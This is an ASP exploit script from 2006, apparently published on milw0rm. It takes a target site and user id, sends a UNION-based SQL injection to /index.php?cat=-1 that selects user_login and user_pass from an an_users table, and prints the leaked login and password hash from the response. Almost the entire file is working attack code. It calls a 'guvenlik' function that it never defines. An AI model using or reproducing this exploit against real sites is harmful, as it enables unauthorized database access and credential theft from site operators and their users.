<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "There is a problem! Please complete to the whole spaces"
End If
If islem = "hata2" Then
Response.Write "There is a problem! Please right character use"
End If
If islem = "hata3" Then
Response.Write "There is a problem! Add ""http://"""
End If
%>
<%
If islem = "get" Then
string1="/index.php?cat=-1%20union%20"
string2="select%200,concat(user_login,char(32)"
string3=",user_pass),0,0,"
string4="0%20from%20an_users%"
string5="20where%20user_id%20"
string6="like%20"
string7=Request.Form("id")
string8="/*"
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit3.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit3.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit3.asp?islem=hata3")
Else
%>
<%
target1 = targettext+string1+string2+string3+string4+string5+string6+string7+string8
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "GET" , come, FALSE
.sEnd
take = .Responsetext
End With
SET objtake = Nothing
End Function
get_username = take(target1)
getdata=InStr(get_username,"""box-content"">" )
username=Mid(get_username,getdata+14,60)
%>
ajann
Data:
<%=guvenlik(username)%>
<%
End If
End If
End If
End If
Set objtake = Nothing
%>
# milw0rm.com [2006-10-29]